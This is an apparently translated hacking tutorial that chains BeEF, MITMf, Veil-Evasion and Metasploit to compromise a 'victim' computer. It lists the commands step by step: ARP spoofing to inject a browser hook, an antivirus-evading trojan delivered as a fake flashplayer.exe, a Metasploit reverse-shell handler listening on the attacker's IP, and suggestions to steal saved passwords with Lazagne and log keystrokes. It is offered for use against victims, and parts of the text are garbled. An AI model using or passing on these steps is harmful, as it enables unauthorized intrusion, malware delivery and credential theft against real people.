Idea: Beef + Mitmf + Veil Evasion + Metasploit.
Beef: Used to upload the file containing the trojan that Veil Evasion created to the victim’s computer via a web browser
Mitmf is responsible for injecting hook.js to any website when the victim opens any new website.
Mitmf can also inject any trojan file into the victim’s computer when the victim downloads a .zip file to the computer without knowing that the .zip file is infected with the trojan.
| Join the channel Telegram of the AnonyViet 👉 Link 👈 |
Mitmf can also record keystrokes on the victim’s computer when accessing the web browser via jskeylogger
Veil Evasion: create a trojan that bypasses all anti-virus software without being detected running in the background of the victim’s computer. create trojan with IP and PORT of hacker computer.
Metasploit. Always listen at the hacker’s IP and PORT when the victim opens the file containing the trojan, the hacker will break into the victim’s computer and take full control. By using commands in Metasploit. The next series of articles I will guide you to use Metasploit Untimate. To increase the fun and uniqueness, you can combine Lazagne to get the user and password information that the victim has saved on the web browser. ===> self-advocacy added
Prepare:
https://github.com/byt3bl33d3r/MITMf
https://github.com/Veil-Framework/Veil-Evasion
OS: Kali Linux.
Perform:
1. Config Beef.
CD /usr/share/beef-xss/extensions/metasploit.
vi config.yaml
host: “192.168.1.12”
callback_host: “192.168.1.12”
{os: ‘custom’, path: ‘/usr/share/metasploit-framework/’}
cd /usr/share/beef-xss
vi config.yaml
metasploit:
enable: true
Run Beef ./beef
Enter the following address in your browser UI URLs: http://192.168.1.12:3000/ui/panel user and password default: beef and beef
./Veil-Evasion.py
Run Metasploit.
msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.12
LHOST => 192.168.1.12
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit[*] Started reverse handler on 192.168.1.12:4444 [*] Starting the payload handler…
Run Mitmf.
mitmf –spoof –arp -i eth0 –gateway 192.168.1.1 –target 192.168.1.18 –inject –js-url http://192.168.1.12:3000/hook.js
To make the game more fun and interesting, I searched on the internet for a song with the hacker’s signature style and will play on the victim’s computer through Beef. when i do this my computer will automatically play music without any warning.
Copy the song here.
/usr/share/beef-xss/extensions/demos/html
copy the generated trojan here.
/usr/share/beef-xss/extensions/social_engineering/droppers
/usr/share/beef-xss/modules/exploits/local_host/firefox_extension_dropper/dropper
To do this you need to run the following code:
curl -H “Content-Type: application/json; charset=UTF-8” -d'{“mount”:”/flashplayer.exe”, “local_file”:”/extensions/social_engineering/droppers/flashplayer.exe”}’ -X POST 192.168.1.12.132/api/ server/bind?token=4e0f77f2f2ef98f7fd3cd18aebbf96d75ef051c c
==> I do not explain here you have to do your own research.
Play hacker music on the victim’s computer for the victim to relax a bit 
In the end, we successfully break into the victim’s computer and also play music for the victim to listen to. There are many more techniques in this article that I do not publicize because of its dangerous nature. people do their own research and think more 
(hackerutudent93 and source from Whitehat.vn)
